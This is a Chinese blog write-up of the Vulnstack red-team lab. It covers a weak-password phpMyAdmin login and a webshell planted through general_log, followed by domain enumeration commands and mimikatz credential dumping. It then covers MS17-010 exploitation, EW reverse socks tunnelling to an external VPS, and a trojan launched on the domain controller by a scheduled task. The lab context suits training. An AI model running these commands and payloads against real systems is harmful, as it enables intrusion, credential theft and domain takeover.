ATT&CK实战 | Vulnstack 红队(一)

攻击机:192.168.47.135 192.168.161.129

双网卡:192.168.161.128    192.168.52.143
域成员:192.168.52.141
域控制器:192.168.52.138
 
用nmap扫一波发现开启了80、3306端口
于是试试看有没有phpmyadmin,果然有,结果尝试弱密码root/root进去了
show variables like '%secure%';
发现没有写入权限,无法用select into outfile方法写入shell。我们再来看一下第二种方法,利用全局变量general_log去getshell
show variables like '%general%'; 
我们将全局日志开启并将保存日志的目录设为web目录
set global general_log=on;#开启日志
set global general_log_file='C:/phpStudy/WWW/yxcms/shell.php';#设置日志位置为网站目录
show variables like '%general%'; #再执行一下查看
直接执行如下语句即可插入webshell到shell.php中
select'<?php eval($_POST[whoami]); ?>'
 
上传windows马
cs上线
判断网络
模拟公网:192.168.161.0/24
模拟内网:192.168.52.0/24
 
ipconfig /all   # 查看本机ip,所在域
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享
net share ipc$  # 开启ipc共享
net share c$    # 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators    # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器(可能有多台)
 
路由信息:
 
 
 
收集到一下关键信息:
该域名为god.org,域控为OWA$,域管理员为Administrator,内网网段为192.168.52.1/24,我们用Ping命令探测域控的ip
可知域控ip为192.168.52.138。
域内存活主机探测/系统/端口

 

Ladon 192.168.52.0/24 OnlinePC
192.168.52.138 DC
192.168.52.141 域成员
 
在win7创建一个用户,在把它丢到administrators里面
然后设法远程桌面登录,查看3389是否开启:
建立frp代理
生成win的木马
这边设置监听4444端口
 
利用msf抓取hash模块
upload /root/zhuomian/mimikatz_trunk/x64/mimikatz.exe c:\\  #把mimikatz上传到目标服务器的c盘下
chcp 65001 #设置一下编码
privilege::debug #权限提升
sekurlsa::logonPasswords
拿到administrator(域管理员)的明文密码——hongrisec@2021
接下来我们进一步渗透入内网,对域中的其他主机进行渗透。
横向移动
前面已经进行了内网存活的主机探测了,这里还有一种方法能够探测
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL=" 用Ping命令探测内网主机
探测到一台内网主机,ip为192.168.52.141(DC)。我们添加一下路由,对该主机进行渗透
试一下ms17_010_eternalblue_doublepulsar打一下康康行不行
ms17_010貌似是打失败了,不过没事
把ew丢到目标服务器(win7),在执行ew_for_Win.exe -s rssocks -d 你的vps -e 1234
vps执行 ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
/etc/proxychains.conf文件中修改以下
用nmap对域成员(DC)服务器进行3389端口扫描(发现没有开启)
proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141 # -Pn和-sT必须要有
这边尝试用auxiliary/admin/smb/ms17_010_command模块开启他3389端口
但是这边扫描还是没有打开,不知道怎么回事
我们在exploit/windows/smb/ms17_010_psexec模块之前必须要指定一个用户,才能拿到shell
所以我们用ms17_010_command模块(可以执行命令)创建一个用户
 
添加进管理员组
查看是否添加进管理员组
设置该模块的参数
打了几次才成功,打了两次蓝屏了(实战建议不要使用该漏洞)
DC已经拿下了,接下来拿下域控
由于3389端口打开不了,于是用IPC连接,使域c盘共享。
net use \\192.168.52.138\c$ "hongrisec@2021" /user:"administrator"
利用IPC连接把shell拷贝到域控的c盘下
copy c:\phpStudy\WWW\yxcms\artifact.exe \\192.168.52.138\c$
设置一个任务计划,定时启动木马之后就能够获取域控的shell了
shell schtasks /create /tn "test" /tr C:\artifact.exe /sc once /st 14:37 /S 192.168.52.138 /RU System  /u administrator /p "hongrisec@2021"
 

 

 

 
posted @ 2021-04-11 14:58  kawasaki_000  阅读(141)  评论(0)    收藏  举报